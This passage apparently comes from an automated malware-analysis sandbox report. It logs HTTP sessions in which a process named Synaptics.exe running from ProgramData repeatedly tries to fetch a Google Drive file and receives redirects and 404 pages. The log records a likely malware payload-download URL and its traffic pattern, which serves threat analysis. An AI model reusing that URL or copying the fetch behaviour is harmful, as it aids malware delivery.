                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:32 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5tB4ZSa22yKLtARIbndnmCJ_oZwwz63dpCk6Q_ClVYxd45NWERMSX98p1rv-5YSq8ofNhGwZQ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:31 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EaziQ_cIt_9Dlp5jb-QkzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:32 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:32 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 63 74 44 36 41 2d 32 45 41 69 4c 67 6c 36 72 76 62 5f 39 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="DctD6A-2EAiLgl6rvb_9Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:32 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    82192.168.2.449873142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-KK017dvD5YDlc2gtgr9aww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    83192.168.2.449872142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC729wdkrE3hx8FyEGT0hnE-4MeTLK1MKnDV4cFtLG8bZ-wtfmQzpbuxegoYmQxJxJ6V
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-t4qd5EpHE6LSIUYWXf1fuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 76 71 51 44 70 64 30 70 78 6b 6d 4e 57 4e 4e 34 4a 39 64 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="avqQDpd0pxkmNWNN4J9dKA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    84192.168.2.449874142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TATrBJ69shn1HH_BGAhG2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    85192.168.2.449875142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7sj2j0nbUHWk1a5MgCGDq7rq6fA_d6BnPp2IlmRb9N17Ccrw-Bk9CY9lue5ylHeftKDl3sDyo
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-B-5r0DGtruTCPj1clq-u1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 6c 57 70 77 78 37 72 67 5f 74 42 69 30 4a 72 45 66 37 57 4d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="NlWpwx7rg_tBi0JrEf7WMQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    86192.168.2.449878142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5q4kGZrqZ6KrQvvt09SfjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    87192.168.2.449879142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6H__jp48lMPl_U3TEFh-FoqSc_MvrIze9ez4eSG4gcR3B17k6gHjs1gX-KasSHhGU-
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yMgLJlmvrUBIyazQiUz9OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
